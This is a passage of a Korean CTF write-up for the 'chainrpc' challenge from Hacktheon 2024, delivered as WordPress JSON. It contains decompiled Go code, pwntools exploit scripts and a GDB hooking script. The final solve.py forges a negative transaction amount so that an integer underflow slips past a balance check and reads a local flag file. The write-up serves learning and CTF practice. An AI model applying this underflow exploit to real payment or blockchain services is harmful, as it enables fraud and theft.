      \ucc28\ub840\ub85c \ud638\ucd9c\ud6c4\uc5d0 transaction \ud568\uc218 \uc774\ub984\uc744 \uc0dd\uac01\ud574\ubd24\uc744\ub54c, \uad00\ub828 \ub0b4\uc6a9\uc774 \ub4e4\uc5b4\uac00\uc57c\ud560 \uac83 \uac19\uc544
      blockchain.json \ud30c\uc77c \ub0b4\uc6a9\uc5d0 \uc788\ub294 transactions 0\ubc88\uc9f8 \uc778\ub371\uc2a4 \uad6c\ubb38\uc744 \ub123\uc5b4\ubd24\ub2e4.<\/p>\n\n\n\n
      from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\nimport json\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/chainrpc\")\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\nwith open('blockchain.json', 'r', encoding='utf-8') as f:\n    blockchain_data = json.load(f)\n\nwith open('account.json', 'r', encoding='utf-8') as f:\n    account_data = json.load(f)\n\npayload = {\n    \"type\": 4,\n    \"args\": blockchain_data,\n    \"from\": \"CCCC\"\n}\n\n\n#stage 1\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\n#stage 2\npayload = json.loads(payload)\npayload[\"type\"] = 5\npayload[\"args\"].update(account_data)\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n#stage 3\npayload = json.loads(payload)\npayload[\"type\"] = 6\npayload[\"args\"].update(blockchain_data[\"blocks\"][0][\"transactions\"][0])\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\np.interactive()<\/pre>\n\n\n\n
      \uadf8\ub7ac\ub354\ub2c8 account not found \uc5d0\ub7ec \ubc1c\uc0dd.<\/p>\n\n\n\n
      ...\nValid account. Restore Complete\n{\"privateKey\":\"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\",\"publicKey\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"balance\":50}\naccount not found<\/pre>\n\n\n\n
      \uc774\ubc88\uc5d0\ub294 blockchain.json \ud30c\uc77c \ub0b4\uc6a9\uc5d0 \uc788\ub294 transactions 1\ubc88\uc9f8 \uc778\ub371\uc2a4 \uad6c\ubb38\uc744 \ub123\uc5b4\ubd24\ub2e4.<\/p>\n\n\n\n
      from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\nimport json\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/chainrpc\")\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\nwith open('blockchain.json', 'r', encoding='utf-8') as f:\n    blockchain_data = json.load(f)\n\nwith open('account.json', 'r', encoding='utf-8') as f:\n    account_data = json.load(f)\n\npayload = {\n    \"type\": 4,\n    \"args\": blockchain_data,\n    \"from\": \"CCCC\"\n}\n\n\n#stage 1\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\n#stage 2\npayload = json.loads(payload)\npayload[\"type\"] = 5\npayload[\"args\"].update(account_data)\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n#stage 3\npayload = json.loads(payload)\npayload[\"type\"] = 6\npayload[\"args\"].update(blockchain_data[\"blocks\"][0][\"transactions\"][1])\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\np.interactive()<\/pre>\n\n\n\n
      \uc131\uacf5\uc801\uc73c\ub85c \uc218\ud589\ud55c\ub4ef \uc2f6\ub2e4. \uc544\ub798 \uba54\uc2dc\uc9c0\uac00 \ub098\ud0c0\ub09c\ub2e4.<\/p>\n\n\n\n
      Sending transaction<\/code><\/p>\n\n\n\n
      ...\nValid account. Restore Complete\n{\"privateKey\":\"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\",\"publicKey\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"balance\":50}\nSending transaction<\/pre>\n\n\n\n
      type\uc774 7\uc77c \uacbd\uc6b0.<\/h3>\n\n\n\n
      ArgType\uc774 1, \uc989 \u201cargs\u201d \ud0a4 \uac12 \ud0c0\uc785\uc740 string\uc774\uc5ec\uc57c\ud568.<\/p>\n\n\n\n
      \uc544\ub798 \ud568\uc218\ub97c \ud638\ucd9c\ud568.<\/p>\n\n\n\n
        \n
      • encoding_base64__ptr_Encoding_DecodeString<\/code><\/li>\n\n\n\n
      • chainrpc_pkg_shorthash__ptr_digest_Write<\/code><\/li>\n\n\n\n
      • chainrpc_pkg_shorthash__ptr_digest_Sum<\/code><\/li>\n\n\n\n
      • runtime_convTslice<\/code><\/li>\n\n\n\n
      • fmt_Sprintf<\/code><\/li>\n<\/ul>\n\n\n\n
        %x<\/code> \ubb38\uc790\uc5f4\uc744 \ubcf4\uc544\ud558\ub2c8 \uc5b4\ub5a0\ud55c 16\uc9c4\uc218\uac12\uc744 \ucd9c\ub825\ud558\ub294\ub4ef.<\/p>\n\n\n\n
        if ( _type != 7 )\n        return 0;\n      if ( ArgType != 1 )\n        goto LABEL_35;\n      v53 = (__int64 (__golang *)(__int64, __int64))runtime_newobject(\n                                                      qword_4F7140,\n                                                      v20,\n                                                      7,\n                                                      (int)\"\\b\",\n                                                      v11,\n                                                      v22,\n                                                      v23,\n                                                      v24,\n                                                      v25);\n      v107 = (unsigned __int64 *)v53;\n      *(_QWORD *)v53 = 0;\n      v54 = (__int64)v53;\n      if ( encoding_json_Unmarshal(v104, v102, v103, (__int64)\"\\b\", v53, v55, v56, v57, v58) )\n      {\n        return 0;\n      }\n      else\n      {\n        v63 = *v107;\n        v64 = encoding_base64__ptr_Encoding_DecodeString(\n                qword_5F3500,\n                *v107,\n                v107[1],\n                (unsigned int)\"\\b\",\n                v54,\n                v59,\n                v60,\n                v61,\n                v62);\n        if ( \"\\b\" )\n        {\n          return 0;\n        }\n        else\n        {\n          v95 = 0;\n          v96 = 0;\n          v97 = 0;\n          v98 = 0;\n          v99 = 0;\n          chainrpc_pkg_shorthash__ptr_digest_Write((__int64)&v95, v64, v63, v65, v54, v66, v67, v68, v69);\n          v74 = chainrpc_pkg_shorthash__ptr_digest_Sum(\n                  (unsigned int)&v95,\n                  0,\n                  0,\n                  0,\n                  v54,\n                  v70,\n                  v71,\n                  v72,\n                  v73,\n                  v85,\n                  v88,\n                  v91);\n          v105 = v9;\n          v80 = runtime_convTslice(v74, 0, v75, 0, v54, v76, v77, v78, v79, v86, v89, v92);\n          *(_QWORD *)&v105 = &unk_4F61C0;\n          *((_QWORD *)&v105 + 1) = v80;\n          return fmt_Sprintf((unsigned int)\"%x\", 2, (unsigned int)&v105, 1, 1, v81, v82, v83, v84, v87, v90, v93, v94);\n        }\n      }<\/pre>\n\n\n\n
        ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ .\/chainrpc\n{\"type\": 7, \"args\": \"BBBBBBBB\", \"from\": \"CCCCCCCC\"}\n1f131f15<\/pre>\n\n\n\n
        type\uc774 1~7 \uadf8 \uc678\uc778 \uacbd\uc6b0.<\/h3>\n\n\n\n
        NO OUTPUT. \uc544\ubb34\uac83\ub3c4 \ucd9c\ub825\ub418\uc9c0 \uc54a\uc74c.<\/p>\n\n\n\n
        Flag \uc5b4\ub528\ub098?<\/h3>\n\n\n\n
        \ubb38\uc790\uc5f4 \uac80\uc0c9\ud574\ubcf4\ub2c8 chainrpc_pkg_account._ptr_account.SendTransaction<\/code> \ud568\uc218\uc5d0\uc11c \ucc38\uc870.<\/p>\n\n\n\n
        .text:00000000004E8A3D\tchainrpc_pkg_account._ptr_account.SendTransaction\t48 8D 05 95 CB 02 00                                            lea     rax, aFlag      ; \"flag\u201d<\/pre>\n\n\n\n
        math_big__ptr_Int_Cmp<\/code>\uc5d0\uc11c \ube44\uad50\ud568, \ubcf4\ub0b4\ub294 \uc591\uc774 99999999<\/code>\uc778\uc9c0 \ud655\uc778.<\/p>\n\n\n\n
        _UNKNOWN **__golang chainrpc_pkg_account__ptr_account_SendTransaction(\n...\n    else\n    {\n      v63 = *(void (__golang **)(__int64, __int64, __int64, _QWORD *))(v58 + 40);\n      v63(v59, v52, v51, v61);\n      v110 = 99999999;\n      v114 = 0;\n      v116 = 1;\n      v117 = 1;\n      v115 = &v110;\n      if ( math_big__ptr_Int_Cmp(a1[6], (unsigned int)&v114, v64, (_DWORD)v61, (_DWORD)v63, v65, v66, v67, v68) <= 0 )\n        return 0;\n      File = os_ReadFile((unsigned int)\"flag\", 4, v69, (_DWORD)v61, (_DWORD)v63, v70, v71, v72, v73, v99, v105);\n      if ( !v61 )\n      {\n        v129 = v9;\n        v79 = File;\n        v80 = runtime_slicebytetostring(0, File, 4, 0, (_DWORD)v63, v75, v76, v77, v78);\n        v86 = runtime_convTstring(v80, v79, v81, 0, (_DWORD)v63, v82, v83, v84, v85, v100, v106);\n        *(_QWORD *)&v129 = qword_4F7140;\n        *((_QWORD *)&v129 + 1) = v86;\n        fmt_Fprintln((unsigned int)&off_544A80, qword_5F34E8, (unsigned int)&v129, 1, 1, v87, v88, v89, v90);\n        return 0;\n      }\n      return (_UNKNOWN **)v61;\n    }<\/pre>\n\n\n\n
        int \uc5b8\ub354\ud50c\ub85c\uc6b0\ub97c \ud1b5\ud574
        \ubcf4\ub0b4\ub294 \uc591 Amount\ub97c int \ucd5c\uc18c\uac12 - \uc694\uad6c\uac12 99999999<\/code> \uc73c\ub85c \uc218\uc815\ud558\uba74 flag \ub0b4\uc6a9\uc744 \uc5bb\uc744 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n
        solve.py<\/h3>\n\n\n\n
        from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\nimport json\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/chainrpc\")\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\nwith open('blockchain.json', 'r', encoding='utf-8') as f:\n    blockchain_data = json.load(f)\n\nwith open('account.json', 'r', encoding='utf-8') as f:\n    account_data = json.load(f)\n\npayload = {\n    \"type\": 4,\n    \"args\": blockchain_data,\n    \"from\": \"CCCC\"\n}\n\n\n#stage 1\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\n#stage 2\npayload = json.loads(payload)\npayload[\"type\"] = 5\npayload[\"args\"].update(account_data)\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n#stage 3\npayload = json.loads(payload)\npayload[\"type\"] = 6\npayload[\"args\"].update(blockchain_data[\"blocks\"][0][\"transactions\"][1])\n\namount = payload[\"args\"][\"Amount\"]\nsuccess(f\"orig amount: {amount}\")\n\npayload[\"args\"][\"Amount\"] = -2147483648 - 99999999\namount = payload[\"args\"][\"Amount\"]\nsuccess(f\"new amount: {amount}\")\n\npayload = json.dumps(payload)\nsuccess(f\"payload: {payload}\")\nsl(payload)\n\n\np.interactive()<\/pre>\n\n\n\n
        Result<\/h3>\n\n\n\n
        ubuntu@2d0f4d9a440c:~\/hto2024\/chainrpc$ python3 solve_test3_2.py \n[+] Starting local process '.\/chainrpc': pid 6694\n[+] payload: {\"type\": 4, \"args\": {\"blocks\": [{\"index\": 0, \"timestamp\": \"2024-03-08T04:57:24+09:00\", \"transactions\": [{\"From\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"To\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"Amount\": 10000, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"}, {\"From\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"To\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"Amount\": 50, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}], \"hash\": \"1a05060d\", \"prevHash\": \"\"}], \"transactionPool\": []}, \"from\": \"CCCC\"}\n[+] payload: {\"type\": 5, \"args\": {\"blocks\": [{\"index\": 0, \"timestamp\": \"2024-03-08T04:57:24+09:00\", \"transactions\": [{\"From\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"To\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"Amount\": 10000, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"}, {\"From\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"To\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"Amount\": 50, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}], \"hash\": \"1a05060d\", \"prevHash\": \"\"}], \"transactionPool\": [], \"privateKey\": \"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\", \"publicKey\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"balance\": 50}, \"from\": \"CCCC\"}\n[+] orig amount: 50\n[+] new amount: -2247483647\n[+] payload: {\"type\": 6, \"args\": {\"blocks\": [{\"index\": 0, \"timestamp\": \"2024-03-08T04:57:24+09:00\", \"transactions\": [{\"From\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"To\": \"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\", \"Amount\": 10000, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"}, {\"From\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"To\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"Amount\": 50, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}], \"hash\": \"1a05060d\", \"prevHash\": \"\"}], \"transactionPool\": [], \"privateKey\": \"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\", \"publicKey\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"balance\": 50, \"From\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"To\": \"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\", \"Amount\": -2247483647, \"Fee\": 0, \"Timestamp\": \"2024-03-08T04:57:24+09:00\", \"Message\": \"\", \"Signature\": \"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}, \"from\": \"CCCC\"}\n[*] Switching to interactive mode\n{\"blocks\":[{\"index\":0,\"timestamp\":\"2024-03-08T04:57:24+09:00\",\"transactions\":[{\"From\":\"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\",\"To\":\"A\/KyPk2E3zD5Aq3qw5\/OJuhmMEeF8XZ8k\/oewDO9ogE=\",\"Amount\":10000,\"Fee\":0,\"Timestamp\":\"2024-03-08T04:57:24+09:00\",\"Message\":\"\",\"Signature\":\"0qf7IJJ2VZS6oa9FnTodiizamX5StE67TrbU2UCBNrmnFv1wK1ibYENIwh\/7Bz0u1Q8v5Gmx4QE8alX+wwRvAg==\"},{\"From\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"To\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"Amount\":50,\"Fee\":0,\"Timestamp\":\"2024-03-08T04:57:24+09:00\",\"Message\":\"\",\"Signature\":\"qf8BRobRtmn75XmwCy0hiF5ODys7c4PY9B3fV\/gcbaV7rRLTHfzRt0BitwH\/a2i\/S7E3z2uUXQxKmM1H1P9sCQ==\"}],\"hash\":\"1a05060d\",\"prevHash\":\"\"}],\"transactionPool\":[]}\nChecking transaction\nValid account. Restore Complete\n{\"privateKey\":\"ytfr62yr84P8P7REsr8CGBFVNgShHXX9DLOD4j9rb9Uims4qsa1gFZvgjCSTtzLejcsC8y9uLzvu5IfVYY1NYg==\",\"publicKey\":\"IprOKrGtYBWb4Iwkk7cy3o3LAvMvbi877uSH1WGNTWI=\",\"balance\":50}\nSending transaction\nflag{fake_flag}<\/pre>\n\n\n\n
        GDB Script<\/h3>\n\n\n\n
        \ud6c4\ud0b9\uc73c\ub85c \ubc18\ud658\uac12\uacfc \ub9e4\uac1c\ubcc0\uc218\ub97c \uc54c\uc544\ubcf4\ub824\ud588\ub294\ub370 \uc548\ub418\uc11c
        GDB \uc2a4\ud06c\ub9bd\ud2b8\ub85c \ub300\uccb4.<\/p>\n\n\n\n
        import gdb\n\n# \uc8fc\uc18c\ubcc4 \ud568\uc218 \uc774\ub984 \ub9e4\ud551\nSTART_HOOK_NAMES = {\n    \"0x4EA0E0\": \"chainrpc_pkg_command_getArgType\",\n    \"0x4EA200\": \"chainrpc_pkg_command_ExecuteCommand\",\n}\nEND_HOOK_NAMES = {\n    \"0x4EA292\": \"chainrpc_pkg_command_getArgType\",\n    \"0x4EAD65\": \"chainrpc_pkg_command_ExecuteCommand\",\n}\n\ndef get_hex_reg(reg):\n    try:\n        val = int(gdb.parse_and_eval(f\"${reg}\"))\n        return hex(val)\n    except gdb.error:\n        return \"0x0\"\n\nclass ChainrpcHook(gdb.Breakpoint):\n    \"\"\"START \uc9c0\uc810 \ud6c4\ud0b9\"\"\"\n    def __init__(self, addr):\n        super().__init__(f\"*{addr}\", gdb.BP_BREAKPOINT)\n        self.addr = addr\n        self.silent = True\n\n    def stop(self):\n        # \ub9e4\ud551\ub41c \ud568\uc218 \uc774\ub984 \uac00\uc838\uc624\uae30 (\uc5c6\uc73c\uba74 \uc8fc\uc18c \uadf8\ub300\ub85c)\n        func = START_HOOK_NAMES.get(self.addr, self.addr)\n        # \ub808\uc9c0\uc2a4\ud130\uac12 \uc218\uc9d1\n        regs = { r: get_hex_reg(r)\n                 for r in (\"rip\", \"rax\", \"rbx\", \"rcx\", \"rdi\", \"rsi\", \"r8\", \"r9\", \"r10\", \"r11\") }\n        print(f\">>> [START hook at {func} ({self.addr})]\\n\"\n              f\"    RIP = {regs['rip']}\\n\"\n              f\"    args = {regs}\")\n        return False\n\nclass ChainrpcHookEnd(gdb.Breakpoint):\n    \"\"\"END \uc9c0\uc810 \ud6c4\ud0b9\"\"\"\n    def __init__(self, addr):\n        super().__init__(f\"*{addr}\", gdb.BP_BREAKPOINT)\n        self.addr = addr\n        self.silent = True\n\n    def stop(self):\n        # \ub9e4\ud551\ub41c \ud568\uc218 \uc774\ub984 \uac00\uc838\uc624\uae30 (\uc5c6\uc73c\uba74 \uc8fc\uc18c \uadf8\ub300\ub85c)\n        func = END_HOOK_NAMES.get(self.addr, self.addr)\n        regs = { r: get_hex_reg(r)\n                 for r in (\"rip\", \"rax\", \"rbx\", \"rcx\", \"rdi\", \"rsi\", \"r8\", \"r9\", \"r10\", \"r11\") }\n        print(f\">>> [END   hook at {func} ({self.addr})]\\n\"\n              f\"    RIP = {regs['rip']}\\n\"\n              f\"    regs = {regs}\")\n        return False\n\n# START \ud6c4\ud0b9 \uc8fc\uc18c\ub4e4\nfor addr in START_HOOK_NAMES:\n    ChainrpcHook(addr)\n\n# END \ud6c4\ud0b9 \uc8fc\uc18c\ub4e4\nfor addr in END_HOOK_NAMES:\n    ChainrpcHookEnd(addr)\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
        checksec Analysis \uc2e4\ud589\ud558\uace0, \uadf8\ub0e5 \uc5d4\ud130\uce58\ub2c8\uae4c JSON \ub0b4\uc6a9\uc744 \uc785\ub825\ud574\uc918\uc57c\ud558\ub294\ub4ef. {} \uc785\ub825 \uacb0\uacfc \u2192 args is nil \uc5d0\ub7ec. chainrpc_pkg_command_ExecuteCommand \ud568\uc218\uc5d0\uc11c \uac80\uc0ac\ud568. args \uad6c\ubb38 \ucd94\uac00\ud574\uc92c\ub354\ub2c8 \uc5d0\ub7ec \uc548\ub738(\ub2e8 \uc544\ubb34 \ucd9c\ub825\uc774 \uc5c6\uc74c). \uc720\ud6a8\ud55c \uad6c\ubb38\uc778\ub4ef\uc2f6\uc74c. a2\uc778 rbx \uac12\uc744 \ud655\uc778\ud574\ubcf4\uba74 ,\u201dDDDD\u201d\ub85c \ub123\uc5b4\ub1a8\ub358 0x44444444\uac00 \ub4e4\uc5b4\uac00\uc788\uc74c. \ub530\ub77c\uc11c \uc5d0\ub7ec \uc548\ub728\ub294\ub370 \ub9de\ub2e4. golang\uc5d0\uc11c JSON\uc744 \ud30c\uc2f1 \ud558\uae30 \uc704\ud574\uc11c\ub294 struct \uc791\uc131 \ud544\uc694. \u201cargs\u201d \uc2a4\ud2b8\ub9c1\uc744 \uac80\uc0c9\ud574\ubd24\ub354\ub2c8 \uc544\ub798 \ud14d\uc2a4\ud2b8\uac00 \ub208\uc5d0… \ub354 \ubcf4\uae30 »[\ud575\ud14c\uc628 2024] chainrpc<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25,24],"class_list":["post-3375","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable","tag-reversing"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3375"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3375\/revisions"}],"predecessor-version":[{"id":3380,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3375\/revisions\/3380"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}